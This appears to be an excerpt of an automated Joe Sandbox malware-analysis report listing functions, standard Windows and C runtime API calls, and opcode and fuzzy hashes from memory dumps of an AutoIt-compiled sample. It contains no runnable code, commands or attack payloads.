                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                            • String ID:
                                            • API String ID: 2800547568-0
                                            • Opcode ID: ce9a57561fcae6f62064aa74a33754842e55545794e325289dcd0a5cf51dca8c
                                            • Instruction ID: c53465f0691ffa2f04182bfec9d83bcbfc0ee21e0b21ac0bdb81f6a62a3e9ad3
                                            • Opcode Fuzzy Hash: ce9a57561fcae6f62064aa74a33754842e55545794e325289dcd0a5cf51dca8c
                                            • Instruction Fuzzy Hash: 6AF0F631831A519AD7216F35880276E76E51F00336FA44105AC10AB0D1CFBC89298F4D
                                            APIs
                                            • InitializeCriticalSectionEx.KERNELBASE(00000000,002EF6A8,00259C4E,?,00259F4B,00000000,00000FA0,00000000,002EBE28,00000008,00259E62,00000000,00000000,?,00259CBC,0000000D), ref: 0025A084
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,002EF6A8,?,00259F4B,00000000,00000FA0,00000000,002EBE28,00000008,00259E62,00000000,00000000,?,00259CBC,0000000D), ref: 0025A08E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CriticalInitializeSection$CountSpin
                                            • String ID:
                                            • API String ID: 4156364057-0
                                            • Opcode ID: 1b2dd7d64036e1c1d1636f7e80788fca3f5c6288695bc5ddfdddb5a3f50a14d3
                                            • Instruction ID: 6b5085dec9ba0bacb271826ba8f2cde2b3ba46ecedeeb2d2a871f9245bd6e534
                                            • Opcode Fuzzy Hash: 1b2dd7d64036e1c1d1636f7e80788fca3f5c6288695bc5ddfdddb5a3f50a14d3
                                            • Instruction Fuzzy Hash: 3FD0673206454DFFCF429F94FC498A93FAAFB48765B448560F91C89030D732A565AB44
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0023558F,?,?,?,?,?), ref: 002381DA
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0023558F,?,?,?,?,?), ref: 0023820D
                                              • Part of subcall function 002378AD: _memmove.LIBCMT ref: 002378E9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$_memmove
                                            • String ID:
                                            • API String ID: 3033907384-0
                                            • Opcode ID: ceaf0264697a68987a608a17aa70389daa887a93076bbe62c7654ad616a2c4c4
                                            • Instruction ID: 8f6f9a2173a98bd3b499fce7724fc3210587050ece7be8f720307813c28d6a2b
                                            • Opcode Fuzzy Hash: ceaf0264697a68987a608a17aa70389daa887a93076bbe62c7654ad616a2c4c4
                                            • Instruction Fuzzy Hash: C501ADB1221214BFEB246A25ED4AF7B3B6CEB89760F10852AFD05DD190DE30A8109A71
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cf1935af4e8c9c4671a02ccd86600c120c6fc9575794068396dc2abd2175d86
                                            • Instruction ID: b0d8aaccd955673addf314e025faed8069a1591ab50dfe725eae74738121895c
                                            • Opcode Fuzzy Hash: 1cf1935af4e8c9c4671a02ccd86600c120c6fc9575794068396dc2abd2175d86
                                            • Instruction Fuzzy Hash: 8D61AEB0A2020A9FDB54EF64DA81B6BB7F5EF05300F54817DEA0A9B241E770ED61CB51
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 856e575772861ea50c216d021f4ec0a67ef684e9ec7b6dfa2c7957538f2d59ec
                                            • Instruction ID: 5e9dc046f99403b800dbe6b8edc9a9510fbabf54f80418e53d57828c467c0915
                                            • Opcode Fuzzy Hash: 856e575772861ea50c216d021f4ec0a67ef684e9ec7b6dfa2c7957538f2d59ec
                                            • Instruction Fuzzy Hash: B2519075620614EFCF18EF68C995F6E77A6AF45710F148068F90AAB382CB30ED24CB55
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 00235CF6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 3fb479450b55c016deac220ea1ef14a4ccc87e72324a0715d3fd25863fda2de4
                                            • Instruction ID: 25206279cb07d3fdc8316dabad907513d7ab2cba461fa846dfffd6a2464a0985
                                            • Opcode Fuzzy Hash: 3fb479450b55c016deac220ea1ef14a4ccc87e72324a0715d3fd25863fda2de4
                                            • Instruction Fuzzy Hash: 3D314DB1A20B2AAFCB18DF2DC48465DB7B5FF48314F14862AE81993710D771BD60DB90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: 9b01eb164de1e6ea89ea468cfda72bafd80232615f8c3f8da821ddea12dc631c
                                            • Instruction ID: 2d167e1f7573fcb55d4dd81278d2d3db6dd3e3cb2c12ceac065529f7e6808fd4
                                            • Opcode Fuzzy Hash: 9b01eb164de1e6ea89ea468cfda72bafd80232615f8c3f8da821ddea12dc631c
                                            • Instruction Fuzzy Hash: 844107B4514351CFDB25DF14C484B1ABBE0BF45318F1988ACE9894B362C372E8A9CF56
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 062aeff277cbc39b2ac4ce263f6cfc9fb00f058064c59d278b7d3348f12efc5e
                                            • Instruction ID: e5f08cd3071ad090bc0c6f5af5aef91834f0bf2522cbb7f44bcbec58587f5ab2
                                            • Opcode Fuzzy Hash: 062aeff277cbc39b2ac4ce263f6cfc9fb00f058064c59d278b7d3348f12efc5e
                                            • Instruction Fuzzy Hash: 97212770A30A18EBDF105F11F88876A7FB9FF10390F228469E889D5510EB7084F0DB45
                                            APIs
                                              • Part of subcall function 00234D13: FreeLibrary.KERNEL32(00000000,?), ref: 00234D4D
                                              • Part of subcall function 0025548B: __wfsopen.LIBCMT ref: 00255496
                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002F62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00234F6F
                                              • Part of subcall function 00234CC8: FreeLibrary.KERNEL32(00000000), ref: 00234D02
                                              • Part of subcall function 00234DD0: _memmove.LIBCMT ref: 00234E1A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Library$Free$Load__wfsopen_memmove
                                            • String ID:
                                            • API String ID: 1396898556-0
                                            • Opcode ID: 97086671bbf42f8a02c375166fdb39cce550ed9d879441e22505dd665510cf03
                                            • Instruction ID: 42ce5987e7ab4aaf928683469f2b3cb39b05339e0424e4652cb1af74e6168b0e
                                            • Opcode Fuzzy Hash: 97086671bbf42f8a02c375166fdb39cce550ed9d879441e22505dd665510cf03
                                            • Instruction Fuzzy Hash: 5B112772630209AACB14BF70DC02BAE77A49F44710F10846AF941A61D1DA71AA359FA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: 48a6b3285cbe1c1cd8d876511d4c8c464998e45e7b5d15d5e10fdffafd56141f
                                            • Instruction ID: f12dceab9ba19975e3f31ba812abcafbf3d800702dd2dbfd68b41e3becb3e2ca
                                            • Opcode Fuzzy Hash: 48a6b3285cbe1c1cd8d876511d4c8c464998e45e7b5d15d5e10fdffafd56141f
                                            • Instruction Fuzzy Hash: D22124B4628351CFCB24DF54C485B1ABBE0BF88314F05896CE98A57762D731E869CF52
                                            APIs
                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 00235D76
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: b3f7be9805a3dea8411f2896fde739f9be9b49465e4ce22debff9f8839b5da11
                                            • Instruction ID: 64c6a14e9434a49d9b55cf49f3c5cc2dcedf8fb2aab7a2887ab7c19487aa0773
                                            • Opcode Fuzzy Hash: b3f7be9805a3dea8411f2896fde739f9be9b49465e4ce22debff9f8839b5da11
                                            • Instruction Fuzzy Hash: 96113AB1210B199FD3308F15C888B62B7E9EF45750F10C92EE4AE86A50D7B0E955CF60
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: f81bb0d9c40211a16c2ddc2fba480c37069f24b1f4b1b952f0fc00164d3fb58f
                                            • Instruction ID: c34b9fd219a07e69edd6ad46ec8a8c3da935a5a68bda4022f8096ce512c770c5
                                            • Opcode Fuzzy Hash: f81bb0d9c40211a16c2ddc2fba480c37069f24b1f4b1b952f0fc00164d3fb58f
                                            • Instruction Fuzzy Hash: D8018FB9610542AFC305EB29C841D2AFBAAFF8A3147148159F819C7742DB30EC31CBE0
                                            APIs
                                            • __lock_file.LIBCMT ref: 00254AD6
                                              • Part of subcall function 00258D68: __getptd_noexit.LIBCMT ref: 00258D68
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit__lock_file
                                            • String ID:
                                            • API String ID: 2597487223-0
                                            • Opcode ID: 74a85e95c057c50a0983824330d01ae02f5f6ca412fc9c517fc2ca4360dbe842
                                            • Instruction ID: e222886f5c7d180740c2ef294e3c342d7edfc6e62473f938e610d1996ede0b5d
                                            • Opcode Fuzzy Hash: 74a85e95c057c50a0983824330d01ae02f5f6ca412fc9c517fc2ca4360dbe842
                                            • Instruction Fuzzy Hash: 75F0A4319602099BDF91BF758C0679FB6A5AF0032FF444514BC14AA1D1CBB88AB8DF59
                                            APIs
                                            • FreeLibrary.KERNEL32(?,?,002F62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00234FDE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: d0c20f82122ce395bdaf029613e9fe3130e5c9f82cecb63bcf5d01372747b672
                                            • Instruction ID: 0fc9587231b1cb832f0e64639c6e89c03227fa957b1663fb1dfadb192d5618e9
                                            • Opcode Fuzzy Hash: d0c20f82122ce395bdaf029613e9fe3130e5c9f82cecb63bcf5d01372747b672
                                            • Instruction Fuzzy Hash: 9CF030B1125712CFC734AF64E494812BBE1BF053297288ABEE5D682A10C771A964DF40
                                            APIs
                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002509F4
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LongNamePath_memmove
                                            • String ID:
                                            • API String ID: 2514874351-0
                                            • Opcode ID: 5eec53174c28da2eb3cbbf17a56de3057e375cc4c5179256d75b02b187a45b67
                                            • Instruction ID: 0257ba9f31bad0856956622f9c6134be5c14ee5a12ca4526a3fc9efb7aa78fe7
                                            • Opcode Fuzzy Hash: 5eec53174c28da2eb3cbbf17a56de3057e375cc4c5179256d75b02b187a45b67
                                            • Instruction Fuzzy Hash: 40E0CD7691422C57C720D6689C05FFA77EDDF89790F0401B6FC0CD7308D961AC918A90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __fread_nolock
                                            • String ID:
                                            • API String ID: 2638373210-0
                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                            • Instruction ID: 44f17082dd88ee2982e6a732e0de3fa94d5787566321e5840231864498a590d7
                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                            • Instruction Fuzzy Hash: 3BE092B0114B015FDB348E28D8157E373E0BB06315F00081CF69A83341EB6278918B59
                                            APIs
                                              • Part of subcall function 00253457: __lock.LIBCMT ref: 00253459
                                            • __onexit_nolock.LIBCMT ref: 00252EA0
                                              • Part of subcall function 00252EC8: RtlDecodePointer.NTDLL(?), ref: 00252EDB
                                              • Part of subcall function 00252EC8: RtlDecodePointer.NTDLL ref: 00252EE6
                                              • Part of subcall function 00252EC8: __realloc_crt.LIBCMT ref: 00252F27
                                              • Part of subcall function 00252EC8: __realloc_crt.LIBCMT ref: 00252F3B
                                              • Part of subcall function 00252EC8: RtlEncodePointer.NTDLL(00000000), ref: 00252F4D
